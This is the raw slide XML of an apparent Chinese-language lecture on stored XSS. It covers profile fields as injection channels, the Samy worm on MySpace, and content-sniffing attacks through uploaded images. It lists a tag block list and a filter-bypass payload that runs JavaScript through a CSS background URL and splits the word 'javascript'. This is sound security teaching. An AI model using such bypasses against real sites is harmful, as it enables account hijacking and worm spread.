            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（用户个人资料）是由一个用户设置并由另一个用户查看的通道。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94" name="Shape 94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1905000"/>
            <a:ext cx="4726401" cy="2875101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11013770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311700" y="577134"/>
            <a:ext cx="8520600" cy="763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a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 100"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这些通道应该是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据通道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>但用户提供的数据可以包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>标记和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果网站未正确清理输入，则通过该通道将其发送到其他用户的浏览器，并由浏览器执行；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>浏览器认为它与来自网站的任何其他代码一样。 因此，该代码具有与网站相同的特权。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1114201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26" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySpace.com   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468" name="Rectangle 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1524000"/>
            <a:ext cx="8686800" cy="5170206"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户可以在他们的页面上发布</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>标签</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>MySpace.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>确保</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中不包含以下标签：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;, &lt;body&gt;, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=javascript://&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>但是可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>标签内部执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>cript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;div style=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>background:url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1)’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>并且可以隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="90000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>ava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>cript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的攻击下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>蠕虫影响了所有访问过受感染的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>页面的人</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>并且把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>作为“朋友”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>小时内有了数百万的“朋友”</a:t>
            </a:r>
            <a:endParaRPr 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46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46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2468">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2468">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2468">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2468">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2468">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246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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用图片的存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rounded Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="2590800"/>
            <a:ext cx="4724400" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>pic.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://site.com/pic.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的结果为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>		            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1  200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		             …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		            Content-Type:  image/jpeg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			 &lt;html&gt;  fooled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>会渲染这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>尽管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>考虑支持图像上传的照片共享网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
